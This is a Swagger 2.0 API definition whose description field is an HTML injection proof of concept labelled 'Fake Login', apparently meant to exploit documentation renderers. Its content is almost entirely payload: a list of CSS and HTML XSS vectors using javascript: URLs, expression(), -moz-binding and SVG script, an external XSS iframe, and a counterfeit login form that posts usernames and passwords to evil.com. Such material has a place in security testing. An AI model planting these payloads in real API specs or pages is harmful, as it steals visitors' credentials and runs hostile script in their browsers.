swagger: '2.0'
info:
  version: 1.0.0
  title: HTML Injection POC
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection By mega7: Fake Login</h1>
    </div>
    <div class="form-container">
        <style>
        @import "javascript:alert('XSS')";
        width: expression(alert('XSS'));
        background: url("javascript:alert('XSS')");
        body {
          -moz-binding: url("data:text/xml;base64,...");
        }
        @keyframes xss {
          from { background: url('javascript:alert(1)'); }
        }
        body { animation: xss 1s; }
        body {
          behavior: url(xss.htc);
        }
        background: url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>');
        :root {
          --xss: url('javascript:alert(1)');
        }
        body {
          background: var(--xss);
        }
        @supports (display: flex) {
          body { background: url('https://attacker.com/flex-supported'); }
        }
        </script>
        <img onany=a(1) src=x id=1 what=a on=1 1=1 t=t t=1 w="1">
        <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="print()"></xss>
        
        <iframe src="https://megaman777.github.io/xss/"></iframe>
        <img src="https://nuclei-us-west-1.s3.us-west-1.amazonaws.com/nuclei.svg">
        <form action="https://evil.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
